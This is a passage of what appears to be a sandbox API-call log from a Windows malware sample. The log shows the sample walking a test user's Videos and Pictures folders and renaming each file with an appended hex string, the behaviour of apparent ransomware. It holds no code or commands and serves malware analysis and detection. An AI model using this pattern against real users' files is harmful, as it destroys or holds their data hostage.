lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.132] NtQueryObject (in: Handle=0x4a8, ObjectInformationClass=0x1, ObjectInformation=0x7609258, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7609258, ReturnLength=0x73dfc54) returned 0x0 [0169.133] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi", lpString2=".DA29885B28F9F972465A7F1D5927102AFAB47EF17D8A98403E93A419EBE99F7E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi.DA29885B28F9F972465A7F1D5927102AFAB47EF17D8A98403E93A419EBE99F7E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\GaX8iFuHaRl\\dfCFe1F6XdsX.avi.DA29885B28F9F972465A7F1D5927102AFAB47EF17D8A98403E93A419EBE99F7E" [0169.133] GetProcessHeap () returned 0x270000 [0169.133] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x4332f38 [0169.133] NtSetInformationFile (FileHandle=0x4a8, IoStatusBlock=0x73dfc44, FileInformation=0x4332f38, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0169.135] CloseHandle (hObject=0x4a8) returned 1 [0169.136] GetProcessHeap () returned 0x270000 [0169.138] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x76091a8 | out: hHeap=0x270000) returned 1 [0169.138] RtlInterlockedCompareExchange64 () returned 0xf [0169.138] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.138] NtQueryObject (in: Handle=0x5e4, ObjectInformationClass=0x1, ObjectInformation=0x76313b0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x76313b0, ReturnLength=0x73dfc54) returned 0x0 [0169.139] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4", lpString2=".9286391ABF37FFBFE2BEAE2155B970285EFC7FEBE4E4E6C3B4B99EB1CEDD8858" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4.9286391ABF37FFBFE2BEAE2155B970285EFC7FEBE4E4E6C3B4B99EB1CEDD8858") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\IvgoCQULr.mp4.9286391ABF37FFBFE2BEAE2155B970285EFC7FEBE4E4E6C3B4B99EB1CEDD8858" [0169.139] GetProcessHeap () returned 0x270000 [0169.139] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x4267da0 [0169.139] NtSetInformationFile (FileHandle=0x5e4, IoStatusBlock=0x73dfc44, FileInformation=0x4267da0, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0169.142] CloseHandle (hObject=0x5e4) returned 1 [0169.142] GetProcessHeap () returned 0x270000 [0169.143] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7631300 | out: hHeap=0x270000) returned 1 [0169.144] RtlInterlockedCompareExchange64 () returned 0xe [0169.144] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.144] NtQueryObject (in: Handle=0x5e0, ObjectInformationClass=0x1, ObjectInformation=0x7781210, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7781210, ReturnLength=0x73dfc54) returned 0x0 [0169.145] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi", lpString2=".C83F0E4083926DF4B4CE4072D64DF7805CEB03C97734BCF20A01A16EC190CE47" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi.C83F0E4083926DF4B4CE4072D64DF7805CEB03C97734BCF20A01A16EC190CE47") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\rU1a5NOEKgMT0KbZLa.avi.C83F0E4083926DF4B4CE4072D64DF7805CEB03C97734BCF20A01A16EC190CE47" [0169.145] GetProcessHeap () returned 0x270000 [0169.145] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x142) returned 0x42582c0 [0169.145] NtSetInformationFile (FileHandle=0x5e0, IoStatusBlock=0x73dfc44, FileInformation=0x42582c0, Length=0x142, FileInformationClass=0xa) returned 0x0 [0169.150] CloseHandle (hObject=0x5e0) returned 1 [0169.151] GetProcessHeap () returned 0x270000 [0169.152] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7781160 | out: hHeap=0x270000) returned 1 [0169.152] RtlInterlockedCompareExchange64 () returned 0xd [0169.152] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.152] NtQueryObject (in: Handle=0x304, ObjectInformationClass=0x1, ObjectInformation=0x77a9368, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x77a9368, ReturnLength=0x73dfc54) returned 0x0 [0169.154] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4", lpString2=".104AC395C9330E930A1CCBD3F99865F14621ACBB899B96FB513C2E3B8527A30A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4.104AC395C9330E930A1CCBD3F99865F14621ACBB899B96FB513C2E3B8527A30A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\llqHI_L IUsBmama\\TgNXZNShVhPaImwZH9B.mp4.104AC395C9330E930A1CCBD3F99865F14621ACBB899B96FB513C2E3B8527A30A" [0169.154] GetProcessHeap () returned 0x270000 [0169.154] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x144) returned 0x4258418 [0169.154] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x73dfc44, FileInformation=0x4258418, Length=0x144, FileInformationClass=0xa) returned 0x0 [0169.156] CloseHandle (hObject=0x304) returned 1 [0169.157] GetProcessHeap () returned 0x270000 [0169.158] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77a92b8 | out: hHeap=0x270000) returned 1 [0169.169] RtlInterlockedCompareExchange64 () returned 0xc [0169.169] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.170] NtQueryObject (in: Handle=0x5c0, ObjectInformationClass=0x1, ObjectInformation=0x77d14c0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x77d14c0, ReturnLength=0x73dfc54) returned 0x0 [0169.171] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv", lpString2=".3B1D37049E0656977EAE768E95FC10139B7B1BBD12F69722914594E67BFDAD1C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv.3B1D37049E0656977EAE768E95FC10139B7B1BBD12F69722914594E67BFDAD1C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\lVhqKKlYkclHgttF.flv.3B1D37049E0656977EAE768E95FC10139B7B1BBD12F69722914594E67BFDAD1C" [0169.171] GetProcessHeap () returned 0x270000 [0169.171] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x146) returned 0x4258570 [0169.172] NtSetInformationFile (FileHandle=0x5c0, IoStatusBlock=0x73dfc44, FileInformation=0x4258570, Length=0x146, FileInformationClass=0xa) returned 0x0 [0169.173] CloseHandle (hObject=0x5c0) returned 1 [0169.175] GetProcessHeap () returned 0x270000 [0169.177] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77d1410 | out: hHeap=0x270000) returned 1 [0169.180] RtlInterlockedCompareExchange64 () returned 0xb [0169.181] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.181] NtQueryObject (in: Handle=0x5bc, ObjectInformationClass=0x1, ObjectInformation=0x77f9618, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x77f9618, ReturnLength=0x73dfc54) returned 0x0 [0169.183] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4", lpString2=".AA94E9C7AD2BD86FB62DCD5E430E5563349AFD0315AE70222D27E7AF32895D68" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4.AA94E9C7AD2BD86FB62DCD5E430E5563349AFD0315AE70222D27E7AF32895D68") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\TYyY-0of37OCQ.mp4.AA94E9C7AD2BD86FB62DCD5E430E5563349AFD0315AE70222D27E7AF32895D68" [0169.183] GetProcessHeap () returned 0x270000 [0169.183] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x140) returned 0x74186e0 [0169.184] NtSetInformationFile (FileHandle=0x5bc, IoStatusBlock=0x73dfc44, FileInformation=0x74186e0, Length=0x140, FileInformationClass=0xa) returned 0x0 [0169.186] CloseHandle (hObject=0x5bc) returned 1 [0169.187] GetProcessHeap () returned 0x270000 [0169.188] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x77f9568 | out: hHeap=0x270000) returned 1 [0169.194] RtlInterlockedCompareExchange64 () returned 0xa [0169.194] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.194] NtQueryObject (in: Handle=0x5e8, ObjectInformationClass=0x1, ObjectInformation=0x7821770, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7821770, ReturnLength=0x73dfc54) returned 0x0 [0169.196] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi", lpString2=".1FE166D1443CA1986B0B458CB5948FB554F16E1810F465C8BCCBEB0041DD072F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi.1FE166D1443CA1986B0B458CB5948FB554F16E1810F465C8BCCBEB0041DD072F") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\GE0jLnj.avi.1FE166D1443CA1986B0B458CB5948FB554F16E1810F465C8BCCBEB0041DD072F" [0169.196] GetProcessHeap () returned 0x270000 [0169.196] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x7821008 [0169.196] NtSetInformationFile (FileHandle=0x5e8, IoStatusBlock=0x73dfc44, FileInformation=0x7821008, Length=0x150, FileInformationClass=0xa) returned 0x0 [0169.199] CloseHandle (hObject=0x5e8) returned 1 [0169.200] GetProcessHeap () returned 0x270000 [0169.201] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78216c0 | out: hHeap=0x270000) returned 1 [0169.203] RtlInterlockedCompareExchange64 () returned 0x9 [0169.203] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.204] NtQueryObject (in: Handle=0x5ec, ObjectInformationClass=0x1, ObjectInformation=0x78498c8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78498c8, ReturnLength=0x73dfc54) returned 0x0 [0169.205] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4", lpString2=".7339E39611B19A7291E6578001EEBDE89A91A1732BA9043A70F32D4657BE676E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4.7339E39611B19A7291E6578001EEBDE89A91A1732BA9043A70F32D4657BE676E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\kTlgx2Q.mp4.7339E39611B19A7291E6578001EEBDE89A91A1732BA9043A70F32D4657BE676E" [0169.205] GetProcessHeap () returned 0x270000 [0169.205] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x150) returned 0x7733488 [0169.205] NtSetInformationFile (FileHandle=0x5ec, IoStatusBlock=0x73dfc44, FileInformation=0x7733488, Length=0x150, FileInformationClass=0xa) returned 0x0 [0169.207] CloseHandle (hObject=0x5ec) returned 1 [0169.209] GetProcessHeap () returned 0x270000 [0169.210] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7849818 | out: hHeap=0x270000) returned 1 [0169.211] RtlInterlockedCompareExchange64 () returned 0x8 [0169.211] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.211] NtQueryObject (in: Handle=0x5f0, ObjectInformationClass=0x1, ObjectInformation=0x7871a20, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7871a20, ReturnLength=0x73dfc54) returned 0x0 [0169.213] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4", lpString2=".319B31D0CFAF1FCD55016EBF52679F50EC9E7246290C2B1781097394DDCC3D02" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4.319B31D0CFAF1FCD55016EBF52679F50EC9E7246290C2B1781097394DDCC3D02") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\l_JxA.mp4.319B31D0CFAF1FCD55016EBF52679F50EC9E7246290C2B1781097394DDCC3D02" [0169.213] GetProcessHeap () returned 0x270000 [0169.213] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14c) returned 0x77335e0 [0169.213] NtSetInformationFile (FileHandle=0x5f0, IoStatusBlock=0x73dfc44, FileInformation=0x77335e0, Length=0x14c, FileInformationClass=0xa) returned 0x0 [0169.215] CloseHandle (hObject=0x5f0) returned 1 [0169.216] GetProcessHeap () returned 0x270000 [0169.218] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7871970 | out: hHeap=0x270000) returned 1 [0169.218] RtlInterlockedCompareExchange64 () returned 0x7 [0169.218] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.218] NtQueryObject (in: Handle=0x5f4, ObjectInformationClass=0x1, ObjectInformation=0x7899b78, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x7899b78, ReturnLength=0x73dfc54) returned 0x0 [0169.219] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4", lpString2=".0BF17413A5591BC937ED56F04D64749E9E2D94C4E2879C29DEB7EC9B4DFFE825" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4.0BF17413A5591BC937ED56F04D64749E9E2D94C4E2879C29DEB7EC9B4DFFE825") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Wxr2rtTDs HM\\wPVx.mp4.0BF17413A5591BC937ED56F04D64749E9E2D94C4E2879C29DEB7EC9B4DFFE825" [0169.219] GetProcessHeap () returned 0x270000 [0169.219] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14a) returned 0x7733738 [0169.219] NtSetInformationFile (FileHandle=0x5f4, IoStatusBlock=0x73dfc44, FileInformation=0x7733738, Length=0x14a, FileInformationClass=0xa) returned 0x0 [0169.221] CloseHandle (hObject=0x5f4) returned 1 [0169.222] GetProcessHeap () returned 0x270000 [0169.224] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7899ac8 | out: hHeap=0x270000) returned 1 [0169.231] RtlInterlockedCompareExchange64 () returned 0x6 [0169.231] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.231] NtQueryObject (in: Handle=0x5b4, ObjectInformationClass=0x1, ObjectInformation=0x78c1cd0, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78c1cd0, ReturnLength=0x73dfc54) returned 0x0 [0169.232] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi", lpString2=".97CB9D940B706AC5139EF0405B14168A79A23184A2370D5B4805850CA5B6DB39" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi.97CB9D940B706AC5139EF0405B14168A79A23184A2370D5B4805850CA5B6DB39") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\riUpXrt01pZMn5 8ov6f\\Z_cuynB3ZGeFf6DVUXD.avi.97CB9D940B706AC5139EF0405B14168A79A23184A2370D5B4805850CA5B6DB39" [0169.232] GetProcessHeap () returned 0x270000 [0169.233] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x14c) returned 0x7733890 [0169.233] NtSetInformationFile (FileHandle=0x5b4, IoStatusBlock=0x73dfc44, FileInformation=0x7733890, Length=0x14c, FileInformationClass=0xa) returned 0x0 [0169.235] CloseHandle (hObject=0x5b4) returned 1 [0169.235] GetProcessHeap () returned 0x270000 [0169.238] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78c1c20 | out: hHeap=0x270000) returned 1 [0169.240] RtlInterlockedCompareExchange64 () returned 0x5 [0169.240] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.240] NtQueryObject (in: Handle=0x5d8, ObjectInformationClass=0x1, ObjectInformation=0x78e9e28, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x78e9e28, ReturnLength=0x73dfc54) returned 0x0 [0169.242] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv", lpString2=".0C50DBCC759ECD3D2C6A46200D5B9684048D429226AAB207C37EA6E52D80366A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv.0C50DBCC759ECD3D2C6A46200D5B9684048D429226AAB207C37EA6E52D80366A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv.0C50DBCC759ECD3D2C6A46200D5B9684048D429226AAB207C37EA6E52D80366A" [0169.242] GetProcessHeap () returned 0x270000 [0169.242] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x43342d8 [0169.242] NtSetInformationFile (FileHandle=0x5d8, IoStatusBlock=0x73dfc44, FileInformation=0x43342d8, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0169.248] CloseHandle (hObject=0x5d8) returned 1 [0169.249] GetProcessHeap () returned 0x270000 [0169.252] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x78e9d78 | out: hHeap=0x270000) returned 1 [0169.255] RtlInterlockedCompareExchange64 () returned 0x4 [0169.255] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.255] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x73e00f8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x73e00f8, ReturnLength=0x73dfc54) returned 0x0 [0169.258] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png", lpString2=".0FCE614293BD42CF0405AC59CF805059570EE9C47A2265332E920D97B75C654D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png.0FCE614293BD42CF0405AC59CF805059570EE9C47A2265332E920D97B75C654D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Pictures\\C1jO8j6\\oeut8R74cBHG7k.png.0FCE614293BD42CF0405AC59CF805059570EE9C47A2265332E920D97B75C654D" [0169.258] GetProcessHeap () returned 0x270000 [0169.258] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x4333070 [0169.258] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x73dfc44, FileInformation=0x4333070, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0169.261] CloseHandle (hObject=0x598) returned 1 [0169.263] GetProcessHeap () returned 0x270000 [0169.265] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.270] RtlInterlockedCompareExchange64 () returned 0x3 [0169.270] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.271] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x74723c8, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x74723c8, ReturnLength=0x73dfc54) returned 0x0 [0169.272] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv", lpString2=".21B7A786E172AD0683EE6C3DC7701FCF88D2D052874541A1286A9E7BF5649269" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv.21B7A786E172AD0683EE6C3DC7701FCF88D2D052874541A1286A9E7BF5649269") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\cBIayRuO2o1rUi4dxeN.flv.21B7A786E172AD0683EE6C3DC7701FCF88D2D052874541A1286A9E7BF5649269" [0169.272] GetProcessHeap () returned 0x270000 [0169.272] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x7418828 [0169.272] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x73dfc44, FileInformation=0x7418828, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0169.274] CloseHandle (hObject=0x58c) returned 1 [0169.275] GetProcessHeap () returned 0x270000 [0169.276] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7472318 | out: hHeap=0x270000) returned 1 [0169.276] RtlInterlockedCompareExchange64 () returned 0x2 [0169.276] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58) returned 1 [0169.279] NtQueryObject (in: Handle=0x594, ObjectInformationClass=0x1, ObjectInformation=0x750a500, ObjectInformationLength=0x10004, ReturnLength=0x73dfc54 | out: ObjectInformation=0x750a500, ReturnLength=0x73dfc54) returned 0x0 [0169.280] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv", lpString2=".C18D313ACF5D6E286A6067686E82A13E6E578674B9D57E4C0E90121424A3BA5D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv.C18D313ACF5D6E286A6067686E82A13E6E578674B9D57E4C0E90121424A3BA5D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Videos\\5SO4gw775L6f\\ff3aNZOdEdDnbufSZH\\NHb7HDfTbT\\pVn3Tay0r5Q-vO94zaW.flv.C18D313ACF5D6E286A6067686E82A13E6E578674B9D57E4C0E90121424A3BA5D" [0169.280] GetProcessHeap () returned 0x270000 [0169.280] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x178) returned 0x427b630 [0169.280] NtSetInformationFile (FileHandle=0x594, IoStatusBlock=0x73dfc44, FileInformation=0x427b630, Length=0x178, FileInformationClass=0xa) returned 0x0 [0169.282] CloseHandle (hObject=0x594) returned 1 [0169.282] GetProcessHeap () returned 0x270000 [0169.284] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x750a450 | out: hHeap=0x270000) returned 1 [0169.286] RtlInterlockedCompareExchange64 () returned 0x2 [0169.286] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x73dfc60, lpCompletionKey=0x73dfc5c, lpOverlapped=0x73dfc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x73dfc60, 